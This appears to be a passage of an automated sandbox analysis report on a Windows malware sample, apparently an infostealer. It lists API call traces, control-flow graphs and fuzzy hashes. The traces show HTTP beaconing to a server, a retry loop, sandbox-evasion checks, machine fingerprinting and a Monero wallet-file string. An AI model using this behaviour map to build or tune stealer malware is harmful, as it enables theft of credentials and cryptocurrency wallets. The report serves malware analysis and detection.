                                  • String ID: HttpQueryInfoA$InternetSetOptionA
                                  • API String ID: 2238633743-1775429166
                                  • Opcode ID: b2d0457fa2cdfac15d777d53e72658d2535d67e25c2095e51b89258ea5a716ef
                                  • Instruction ID: 5b5370d95503858d226de9657413884d8740fa877a6c24a4989fd53db3d4235a
                                  • Opcode Fuzzy Hash: b2d0457fa2cdfac15d777d53e72658d2535d67e25c2095e51b89258ea5a716ef
                                  • Instruction Fuzzy Hash: EC624AB5504240BFE349DFA8ED8996E3BF9F7D8281714C51AA60DC3224D63D98C1CB9B

                                   Control-flow Graph

                                   Basic blocks of the HTTP GET routine at 536280, in address order (block id: address range, calls made in the block → successor blocks). The executed / not-executed colouring of the rendered graph is not preserved in this listing.
                                   • 1033: 536280-53630b, call 54a7a0, call 5347b0, call 54a740, InternetOpenA, StrCmpCA → 1040, 1041
                                   • 1041: 53630d → 1040
                                   • 1040: 536314-536318 → 1042, 1043
                                   • 1043: 53631e-536342, InternetConnectA → 1045, 1046
                                   • 1045: 536348-53634c → 1048, 1049
                                   • 1049: 53634e-536358 → 1051
                                   • 1048: 53635a → 1051
                                   • 1051: 536364-536392, HttpOpenRequestA → 1052, 1053
                                   • 1053: 536398-53639c → 1055, 1056
                                   • 1056: 53639e-5363bf, InternetSetOptionA → 1055
                                   • 1055: 5363c5-536405, HttpSendRequestA, HttpQueryInfoA → 1058, 1059
                                   • 1058: 536407-536427, call 54a740, call 54a800 * 2 → 1062
                                   • 1059: 53642c-53644b, call 548940 → 1067, 1068
                                   • 1068: 53644d-536454 → 1071, 1072
                                   • 1072: 536456-536480, InternetReadFile → 1076, 1077
                                   • 1076: 536482-536489 → 1077, 1078
                                   • 1077: 53648b → 1071
                                   • 1078: 53648d-5364c5, call 54a9b0, call 54a8a0, call 54a800 → 1072
                                   • 1071: 5364c7-5364ef, InternetCloseHandle → 1052
                                   • 1067: 5364c9-5364e9, call 54a740, call 54a800 * 2 → 1062
                                   • 1052: 5364f5-5364f9, InternetCloseHandle → 1046
                                   • 1046: 5364ff-536503, InternetCloseHandle → 1042
                                   • 1042: 536509-536525, call 54a7a0, call 54a800 * 2 → 1062
                                   • 1062: 536528-53652d (exit)
                                  APIs
                                    • Part of subcall function 0054A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0054A7E6
                                    • Part of subcall function 005347B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00534839
                                    • Part of subcall function 005347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00534849
                                    • Part of subcall function 0054A740: lstrcpy.KERNEL32(00550E17,00000000), ref: 0054A788
                                  • InternetOpenA.WININET(00550DFE,00000001,00000000,00000000,00000000), ref: 005362E1
                                  • StrCmpCA.SHLWAPI(?,011FE878), ref: 00536303
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00536335
                                  • HttpOpenRequestA.WININET(00000000,GET,?,011FE158,00000000,00000000,00400100,00000000), ref: 00536385
                                  • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 005363BF
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 005363D1
                                  • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 005363FD
                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0053646D
                                  • InternetCloseHandle.WININET(00000000), ref: 005364EF
                                  • InternetCloseHandle.WININET(00000000), ref: 005364F9
                                  • InternetCloseHandle.WININET(00000000), ref: 00536503
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                   • Associated: the same 14 dump regions (00530000 through 00BBB000) listed under the Memory Dump Source of the preceding functions
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                  • String ID: ERROR$ERROR$GET
                                  • API String ID: 3749127164-2509457195
                                  • Opcode ID: b4cc851dc2db513f4d839afb8a5662e8555eeaf355fa95a9c7f8641272598db2
                                  • Instruction ID: bb0a3a7bba7463fd5b88222dd9ab5b16b3aa01f21cd3e0c6c09f308cf2690119
                                  • Opcode Fuzzy Hash: b4cc851dc2db513f4d839afb8a5662e8555eeaf355fa95a9c7f8641272598db2
                                  • Instruction Fuzzy Hash: 3D714F71A40218BBEF24DFA0CC59BEE7B78FB84704F108559F5096B190DBB46A85CF51

                                   Control-flow Graph

                                   Basic blocks of the request sequence at 545510, in address order (block id: address range, calls made in the block → successor blocks). Three stages follow the same shape: a test block, a request path through 531590 and 5451f0 or 5452c0, a StrCmpCA against ERROR, then either the next stage or a teardown block (531670, 546560, 531550) that returns; the last stage can also Sleep and jump back to 54557c. The executed / not-executed colouring of the rendered graph is not preserved in this listing.
                                   • 1090: 545510-545577, call 545ad0, call 54a820 * 3, call 54a740 * 4 → 1106
                                   • 1106: 54557c-545583 → 1107, 1108
                                   • 1107: 545585-5455b6, call 54a820, call 54a7a0, call 531590, call 5451f0 → 1124
                                   • 1124: 5455bb-5455d2, call 54a8a0, call 54a800 → 1134
                                   • 1108: 5455d7-54564c, call 54a740 * 2, call 531590, call 5452c0, call 54a8a0, call 54a800, call 54aad0, StrCmpCA → 1134, 1138
                                   • 1138: 54564e-54568e, call 54a7a0, call 531590, call 5451f0, call 54a8a0, call 54a800 → 1134
                                   • 1134: 545693-5456a9, call 54aad0, StrCmpCA → 1139, 1140
                                   • 1140: 5456af-5456b6 → 1142, 1143
                                   • 1142: 5456bc-5456c3 → 1146, 1147
                                   • 1146: 5456c5-545719, call 54a820, call 54a7a0, call 531590, call 5451f0, call 54a8a0, call 54a800 → 1143
                                   • 1147: 54571e-545793, call 54a740 * 2, call 531590, call 5452c0, call 54a8a0, call 54a800, call 54aad0, StrCmpCA → 1143, 1246
                                   • 1246: 545795-5457d5, call 54a7a0, call 531590, call 5451f0, call 54a8a0, call 54a800 → 1143
                                   • 1143: 5457da-54585f, call 54aad0, StrCmpCA → 1162, 1163
                                   • 1139: 5457dc-545844, call 54a8a0, call 54a820 * 2, call 531670, call 54a800 * 4, call 546560, call 531550 → 1269
                                   • 1162: 545865-54586c → 1168, 1169
                                   • 1168: 545872-545879 → 1176, 1177
                                   • 1177: 54587b-5458ce, call 54a820, call 54a7a0, call 531590, call 5451f0, call 54a8a0, call 54a800 → 1169
                                   • 1176: 5458d3-545948, call 54a740 * 2, call 531590, call 5452c0, call 54a8a0, call 54a800, call 54aad0, StrCmpCA → 1169, 1274
                                   • 1274: 54594a-54598a, call 54a7a0, call 531590, call 5451f0, call 54a8a0, call 54a800 → 1169
                                   • 1169: 54598f-545a14, call 54aad0, StrCmpCA → 1198, 1199
                                   • 1163: 545991-5459f9, call 54a8a0, call 54a820 * 2, call 531670, call 54a800 * 4, call 546560, call 531550 → 1269
                                   • 1198: 545a16-545a21, Sleep → 1106
                                   • 1199: 545a28-545a91, call 54a8a0, call 54a820 * 2, call 531670, call 54a800 * 4, call 546560, call 531550 → 1269
                                   • 1269: 545ac3-545ac6 (exit)
                                  APIs
                                    • Part of subcall function 0054A820: lstrlen.KERNEL32(00534F05,?,?,00534F05,00550DDE), ref: 0054A82B
                                    • Part of subcall function 0054A820: lstrcpy.KERNEL32(00550DDE,00000000), ref: 0054A885
                                    • Part of subcall function 0054A740: lstrcpy.KERNEL32(00550E17,00000000), ref: 0054A788
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00545644
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 005456A1
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00545857
                                    • Part of subcall function 0054A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0054A7E6
                                    • Part of subcall function 005451F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00545228
                                    • Part of subcall function 0054A8A0: lstrcpy.KERNEL32(?,00550E17), ref: 0054A905
                                    • Part of subcall function 005452C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00545318
                                    • Part of subcall function 005452C0: lstrlen.KERNEL32(00000000), ref: 0054532F
                                    • Part of subcall function 005452C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00545364
                                    • Part of subcall function 005452C0: lstrlen.KERNEL32(00000000), ref: 00545383
                                    • Part of subcall function 005452C0: lstrlen.KERNEL32(00000000), ref: 005453AE
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0054578B
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00545940
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00545A0C
                                  • Sleep.KERNEL32(0000EA60), ref: 00545A1B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen$Sleep
                                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                  • API String ID: 507064821-2791005934
                                  • Opcode ID: ccda7e235012f5134d19957334850e0f901c1fd62c03cd00c8d308697d1af856
                                  • Instruction ID: b9e6edb6b4af80d5ea3fa16d5cfa0df753b86076d981acc96414f4ff28acb546
                                  • Opcode Fuzzy Hash: ccda7e235012f5134d19957334850e0f901c1fd62c03cd00c8d308697d1af856
                                  • Instruction Fuzzy Hash: 7FE16172950105ABEB58FBB0DC5AEED7B38FFD4348F408128B40656096FF346A49CB96

                                  Control-flow Graph

[Control-flow graph of the function starting at 005417A0: block and edge listing and executed/not-executed legend omitted; the APIs it calls are listed below]
                                  APIs
                                  • StrCmpCA.SHLWAPI(00000000,block), ref: 005417C5
                                  • ExitProcess.KERNEL32 ref: 005417D1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess
                                  • String ID: block
                                  • API String ID: 621844428-2199623458
                                  • Opcode ID: 50ef8b2a1804f6da05c12e41ad20d43b011a4985e790ebfa58e8c5b9f7764d2e
                                  • Instruction ID: c30797fe23e81cfc9792d617efa63c4104e3e0a83dd09f59a119295cb0cc0889
                                  • Opcode Fuzzy Hash: 50ef8b2a1804f6da05c12e41ad20d43b011a4985e790ebfa58e8c5b9f7764d2e
                                  • Instruction Fuzzy Hash: DB515DB5B1420AEFDB04DFA0D964AFE7BB5BF44708F108449E806A7380D774E985CB66

                                  Control-flow Graph

[Control-flow graph of the function starting at 00547500: block and edge listing and executed/not-executed legend omitted; the APIs it calls are listed below]
                                  APIs
                                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00547542
                                  • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0054757F
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00547603
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 0054760A
                                  • wsprintfA.USER32 ref: 00547640
                                    • Part of subcall function 0054A740: lstrcpy.KERNEL32(00550E17,00000000), ref: 0054A788
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                  • String ID: :$C$\$U
                                  • API String ID: 1544550907-2300784356
                                  • Opcode ID: a80a41eac952540994cd90d36f9b356af1db5bb95e2b6c809844715f3fcd9db8
                                  • Instruction ID: e9a5eb0ba440d63aee5ad2e715e4045a7fa63bc1ed137a7514023a2c4e734282
                                  • Opcode Fuzzy Hash: a80a41eac952540994cd90d36f9b356af1db5bb95e2b6c809844715f3fcd9db8
                                  • Instruction Fuzzy Hash: 234194B1D04248ABDF10DF94DC45BEEBBB8FF48708F104199F50967280D7786A84CBA5

                                  Control-flow Graph

                                  APIs
                                    • Part of subcall function 00549860: GetProcAddress.KERNEL32(74DD0000,011F2398), ref: 005498A1
                                    • Part of subcall function 00549860: GetProcAddress.KERNEL32(74DD0000,011F2338), ref: 005498BA
                                    • Part of subcall function 00549860: GetProcAddress.KERNEL32(74DD0000,011F2248), ref: 005498D2
                                    • Part of subcall function 00549860: GetProcAddress.KERNEL32(74DD0000,011F23C8), ref: 005498EA
                                    • Part of subcall function 00549860: GetProcAddress.KERNEL32(74DD0000,011F2458), ref: 00549903
                                    • Part of subcall function 00549860: GetProcAddress.KERNEL32(74DD0000,011F91E8), ref: 0054991B
                                    • Part of subcall function 00549860: GetProcAddress.KERNEL32(74DD0000,011E5C30), ref: 00549933
                                    • Part of subcall function 00549860: GetProcAddress.KERNEL32(74DD0000,011E5AD0), ref: 0054994C
                                    • Part of subcall function 00549860: GetProcAddress.KERNEL32(74DD0000,011F2470), ref: 00549964
                                    • Part of subcall function 00549860: GetProcAddress.KERNEL32(74DD0000,011F2488), ref: 0054997C
                                    • Part of subcall function 00549860: GetProcAddress.KERNEL32(74DD0000,011F22A8), ref: 00549995
                                    • Part of subcall function 00549860: GetProcAddress.KERNEL32(74DD0000,011F2260), ref: 005499AD
                                    • Part of subcall function 00549860: GetProcAddress.KERNEL32(74DD0000,011E5D10), ref: 005499C5
                                    • Part of subcall function 00549860: GetProcAddress.KERNEL32(74DD0000,011F2278), ref: 005499DE
                                    • Part of subcall function 0054A740: lstrcpy.KERNEL32(00550E17,00000000), ref: 0054A788
                                    • Part of subcall function 005311D0: ExitProcess.KERNEL32 ref: 00531211
                                    • Part of subcall function 00531160: GetSystemInfo.KERNEL32(?), ref: 0053116A
                                    • Part of subcall function 00531160: ExitProcess.KERNEL32 ref: 0053117E
                                    • Part of subcall function 00531110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0053112B
                                    • Part of subcall function 00531110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00531132
                                    • Part of subcall function 00531110: ExitProcess.KERNEL32 ref: 00531143
                                    • Part of subcall function 00531220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0053123E
                                    • Part of subcall function 00531220: ExitProcess.KERNEL32 ref: 00531294
                                    • Part of subcall function 00546770: GetUserDefaultLangID.KERNEL32 ref: 00546774
                                    • Part of subcall function 00531190: ExitProcess.KERNEL32 ref: 005311C6
                                    • Part of subcall function 00547850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,005311B7), ref: 00547880
                                    • Part of subcall function 00547850: RtlAllocateHeap.NTDLL(00000000), ref: 00547887
                                    • Part of subcall function 00547850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0054789F
                                    • Part of subcall function 005478E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00547910
                                    • Part of subcall function 005478E0: RtlAllocateHeap.NTDLL(00000000), ref: 00547917
                                    • Part of subcall function 005478E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0054792F
                                    • Part of subcall function 0054A9B0: lstrlen.KERNEL32(?,011F8F68,?,\Monero\wallet.keys,00550E17), ref: 0054A9C5
                                    • Part of subcall function 0054A9B0: lstrcpy.KERNEL32(00000000), ref: 0054AA04
                                    • Part of subcall function 0054A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0054AA12
                                    • Part of subcall function 0054A8A0: lstrcpy.KERNEL32(?,00550E17), ref: 0054A905
                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,011F92A8,?,0055110C,?,00000000,?,00551110,?,00000000,00550AEF), ref: 00546ACA
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00546AE8
                                  • CloseHandle.KERNEL32(00000000), ref: 00546AF9
                                  • Sleep.KERNEL32(00001770), ref: 00546B04
                                  • CloseHandle.KERNEL32(?,00000000,?,011F92A8,?,0055110C,?,00000000,?,00551110,?,00000000,00550AEF), ref: 00546B1A
                                  • ExitProcess.KERNEL32 ref: 00546B22
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                  • String ID:
                                  • API String ID: 2931873225-0
                                  • Opcode ID: 5f636fc2b208d53d53bf2304e6877928afe628fa7372581718ef31843060f860
                                  • Instruction ID: cf704f6967340797bf9caf3e06454f7233708775cff4ef47f973fbdc01b08a18
                                  • Opcode Fuzzy Hash: 5f636fc2b208d53d53bf2304e6877928afe628fa7372581718ef31843060f860
                                  • Instruction Fuzzy Hash: B1313E7194020AAAEB44FBF0DC5EBEE7F78FF84349F104518F602A2182DF746945C6A6

                                  Control-flow Graph

[Control-flow graph of the function whose blocks span 00546ABA-00546B22: block and edge listing and executed/not-executed legend omitted; the APIs it calls are listed below]
                                  APIs
                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,011F92A8,?,0055110C,?,00000000,?,00551110,?,00000000,00550AEF), ref: 00546ACA
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00546AE8
                                  • CloseHandle.KERNEL32(00000000), ref: 00546AF9
                                  • Sleep.KERNEL32(00001770), ref: 00546B04
                                  • CloseHandle.KERNEL32(?,00000000,?,011F92A8,?,0055110C,?,00000000,?,00551110,?,00000000,00550AEF), ref: 00546B1A
                                  • ExitProcess.KERNEL32 ref: 00546B22
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                  • String ID:
                                  • API String ID: 941982115-0
                                  • Opcode ID: 1c6eca9f2174af96806c1b64ba5939505bf80724910f60ea23051897c7e1a35e
                                  • Instruction ID: 1a71f80ffe0bbb8efe26a0fdd06ec431d5fa2f1982a73414ecc7b5cc20fc46d3
                                  • Opcode Fuzzy Hash: 1c6eca9f2174af96806c1b64ba5939505bf80724910f60ea23051897c7e1a35e
                                  • Instruction Fuzzy Hash: DDF03A7094021AABF700ABA09C0ABFD7E74FB45749F108914B516A11C1DBB45580D69B

                                  Control-flow Graph

                                  APIs
                                  • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00534839
                                  • InternetCrackUrlA.WININET(00000000,00000000), ref: 00534849
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CrackInternetlstrlen
                                  • String ID: <
                                  • API String ID: 1274457161-4251816714
                                  • Opcode ID: fc75ea9c42582ab13e6fdff2300521862e206f77d65cc7822c12b440567a0bcc
                                  • Instruction ID: 5899b9830b821d44a9a0783a75b1251f2bf759fbd8a01d6875aa04637f62c4d1
                                  • Opcode Fuzzy Hash: fc75ea9c42582ab13e6fdff2300521862e206f77d65cc7822c12b440567a0bcc
                                  • Instruction Fuzzy Hash: A0214FB1D00209ABEF14DFA4E849ADE7B75FB44324F108625F919A72C1EB706A05CF81

                                  Control-flow Graph

                                  APIs
                                    • Part of subcall function 0054A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0054A7E6
                                    • Part of subcall function 00536280: InternetOpenA.WININET(00550DFE,00000001,00000000,00000000,00000000), ref: 005362E1
                                    • Part of subcall function 00536280: StrCmpCA.SHLWAPI(?,011FE878), ref: 00536303
                                    • Part of subcall function 00536280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00536335
                                    • Part of subcall function 00536280: HttpOpenRequestA.WININET(00000000,GET,?,011FE158,00000000,00000000,00400100,00000000), ref: 00536385
                                    • Part of subcall function 00536280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 005363BF
                                    • Part of subcall function 00536280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 005363D1
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00545228
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                  • String ID: ERROR$ERROR
                                  • API String ID: 3287882509-2579291623
                                  • Opcode ID: f28a619b568242368b6eeb2c23dde4374db4737b1db3f643c928767c2fad3c0a
                                  • Instruction ID: 4bc70542ccc2365e46e610cd7e962659a7131a1f575417b396e22e0390aea1bf
                                  • Opcode Fuzzy Hash: f28a619b568242368b6eeb2c23dde4374db4737b1db3f643c928767c2fad3c0a
                                  • Instruction Fuzzy Hash: D7112130944549A7EB54FF70DD5AAED7B38FF90308F404558F80A47192EF306B05CA91

                                  Control-flow Graph

                                  (graph not rendered in this export; basic blocks 531220-53129d with calls to 5489b0, 54da00, GlobalMemoryStatusEx and ExitProcess)
                                  APIs
                                  • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0053123E
                                  • ExitProcess.KERNEL32 ref: 00531294
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitGlobalMemoryProcessStatus
                                  • String ID: @
                                  • API String ID: 803317263-2766056989
                                  • Opcode ID: 6156b65e5fdb7a907204d93c16197f6c6f8988b8b40b316d25ed330e13e22d81
                                  • Instruction ID: a603c05b8a2d266bc040d5ff3a3cdb57fb372e7e6020c8e9a9def8a5d6361c1c
                                  • Opcode Fuzzy Hash: 6156b65e5fdb7a907204d93c16197f6c6f8988b8b40b316d25ed330e13e22d81
                                  • Instruction Fuzzy Hash: 81014BB0940308BAEB10EBE1CC49BAEBB78BB44705F208048F705B6281D67455418B9D
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00547910
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00547917
                                  • GetComputerNameA.KERNEL32(?,00000104), ref: 0054792F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateComputerNameProcess
                                  • String ID:
                                  • API String ID: 1664310425-0
                                  • Opcode ID: f69e4cd5c155e4788bf99405fe38b4d79901b0c3a0a4bded55a373ae031b1c63
                                  • Instruction ID: fe49038ada55ee0120a3333b116c6e8617b8b3286d8bf452717466fbfd030279
                                  • Opcode Fuzzy Hash: f69e4cd5c155e4788bf99405fe38b4d79901b0c3a0a4bded55a373ae031b1c63
